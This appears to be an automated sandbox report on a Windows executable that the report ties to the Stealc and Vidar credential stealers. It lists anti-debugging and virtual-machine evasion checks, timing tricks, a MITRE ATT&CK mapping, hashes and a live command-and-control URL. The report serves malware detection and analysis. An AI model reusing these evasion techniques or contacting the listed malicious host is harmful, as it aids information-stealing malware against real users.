                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96367E second address: 963684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963684 second address: 963690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F98219BDB66h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963690 second address: 963694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963AD2 second address: 963AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98219BDB78h 0x00000009 je 00007F98219BDB66h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963EFF second address: 963F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963F03 second address: 963F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964037 second address: 96403F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96403F second address: 964046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964046 second address: 964054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9820CD6B9Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964054 second address: 964058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B1CD second address: 96B1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6BA1h 0x00000009 jmp 00007F9820CD6B9Bh 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971916 second address: 971930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F98219BDB6Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F98219BDB66h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971A74 second address: 971A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9820CD6B96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971A80 second address: 971A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971A89 second address: 971ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9820CD6B96h 0x0000000a jmp 00007F9820CD6B9Eh 0x0000000f popad 0x00000010 jl 00007F9820CD6BAEh 0x00000016 jmp 00007F9820CD6BA6h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jo 00007F9820CD6B96h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971ACA second address: 971ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971C1A second address: 971C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971C1E second address: 971C32 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F98219BDB66h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971C32 second address: 971C61 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9820CD6B96h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F9820CD6B9Bh 0x00000012 push edi 0x00000013 pop edi 0x00000014 jng 00007F9820CD6B96h 0x0000001a popad 0x0000001b popad 0x0000001c push ecx 0x0000001d push ecx 0x0000001e push eax 0x0000001f pop eax 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jnp 00007F9820CD6B96h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973046 second address: 973055 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9771F2 second address: 9771FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9771FB second address: 977205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97C8DE second address: 97C8FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9820CD6B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9820CD6BA0h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 751A03 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 8ED659 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 751A30 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00504910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00504570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FF68A FindFirstFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00503EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F1160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2144242993.0000000001336000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2144242993.0000000001302000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13406)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13403)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13423)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13418)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13458)
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F45C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00509860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00509750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00507850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 5084, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00509600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00507B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00506920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00507850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00507A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.4f0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2090253153.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5084, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.4f0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2090253153.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5084, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (numbers in parentheses are the signature counts shown per technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (11) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpN | file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpm | file.exe, 00000000.00000002.2144242993.0000000001336000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpr | file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/curity=Impersonation | file.exe, 00000000.00000002.2144242993.0000000001302000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpa | file.exe, 00000000.00000002.2144242993.0000000001336000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpf | file.exe, 00000000.00000002.2144242993.0000000001317000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37$ | file.exe, 00000000.00000002.2144242993.00000000012BE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1538072
Start date and time: 2024-10-20 09:39:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 85
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | S3AYU5t2JP.exe | malicious | LummaC, Amadey, Stealc | 185.215.113.37/
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | S3AYU5t2JP.exe | malicious | LummaC, Amadey, Stealc | 185.215.113.103
WHOLESALECONNECTIONSNL | EY5iB1Y7CH.exe | malicious | Amadey | 185.215.113.43
WHOLESALECONNECTIONSNL | xvus4NLqiQ.exe | malicious | Amadey | 185.215.113.43
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                              No context
                              No context
                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.94820418679776
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'851'392 bytes
MD5: e6bd9e89d78f9970ffe0edaba03dc207
SHA1: d796439cf7a49abf6a7e19808f6e9da46c40e461
SHA256: 20fe22c7cf9c1c920267161320319a6d7b31354826d68c6bca2b188633cfc181
SHA512: b57854fb947884929e5443cd40b3966ec8b0b96f2e7402b7521a5df1a1c3da120c1025125c5b98ec46ef96b8ba08135c47b6334de84e68bd50c2a00077c0b603
SSDEEP: 24576:IOEyZme3uVffPRnJw/FfqOfwvj2dxREw9y4kDmCzZ01ZkqKvuI5DeHE7rSD+1nxG:IOie+pX3wb+j2df0zK1Zd7B6rS0Oh8U
TLSH: AF8533512EF52257C429663B1F18B3A86BDD006C4DDE8F9A2CF0F9BA895F670F711806
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa9e000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x25b000 | 0x22800 | d697e3a312ca8cc739d73bad6030cb10 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x25e000 | 0x2a1000 | 0x200 | f5e4ef0c0ed8e264f3b74d16c2897019 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
